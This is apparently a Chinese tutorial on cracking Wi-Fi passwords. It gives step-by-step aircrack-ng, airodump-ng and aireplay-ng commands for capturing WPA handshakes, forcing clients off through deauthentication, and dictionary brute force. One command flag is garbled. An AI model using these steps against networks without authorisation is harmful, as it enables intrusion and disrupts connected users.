破解wifi两种方式
前言
近源可能会用到wifi破解相关姿势,记录下通过mac和kali抓wifi握手包进行破解的步骤。
MAC破解wifi
安装aircrack-ng
Aircrack-ng是一个与802.11标准的无线网络分析有关的安全软件,主要功能有:网络侦测,数据包嗅探,WEP和WPA/WPA2-PSK破解。Aircrack-ng可以工作在任何支持监听模式的无线网卡上并嗅探802.11a,802.11b,802.11g的数据。
brew install aircrack-ng
通过airport查看周围wifi
sudo ln -s /System/Library/PrivateFrameworks/Apple80211.framework/Versions/Current/Resources/airport /usr/local/bin/airport
airport -s
通过airport抓取握手包
主要看上面的bssid值和CH信道值。
airport en0 sniff 36
通过airport开启嗅探,en0为自己网卡,36为上面的信道值。
且图标变监听状态
等一段时间,有人连接目标wifi后,通过aircrack-ng分析保存的cap文件:
aircrack-ng airportSniff6kSmIs.cap | grep "handshake"
在36信道有两个wifi抓到了握手包
通过aircrack-ng暴力破解
aircrack-ng -w pass.txt -b 74:83:C2:38:23:D5 airportSniff6kSmIs.cap
kali破解方式
kali虚拟机链接网卡
最好买免驱的,即插即用的网卡
查看网卡
airmon-ng /iwconfig
开启网卡监听
airmon-ng start wlan0
扫描wifi信息
airodump-ng wlan0mon
airodump-ng监听握手包
airodump-ng -w test -c 11 --bssid 9C:2E:A1:20:65:BC wlan0mon -ignore-nefative-oneaa
-c:指定信道
-w:指定抓去握手包的存放位置或者名字
–bssid:指定路由器的MAC
反认证攻击强制设备重连
相较于mac通过airport只能被动的监听,kali里面支持通过aireplay-ng进行反认证攻击强制扫描到的设备进行重连抓取握手包。(一边监听,一边进行反认证攻击)
aireplay-ng -0 0 -a 9C:2E:A1:20:65:BC -c A4:50:46:D8:74:29 wlan0mon
-a:指定路由器的MAC
-c:指定客户机的MAC
-0: 0指不间断发起反认证包。
之后可以看到收到handshake。
破解握手包
aircrack-ng -w pass.txt ct.cap
特点
- 破解成功取决于字典厚度
- 通过airport抓握手包不需要装无线网卡,但是没有抓到握手包的提醒,只能看运气
- kali可以进行反认证攻击,强制抓到握手包。
参考
https://wifi-crack.readthedocs.io/en/latest/Wifi破解.html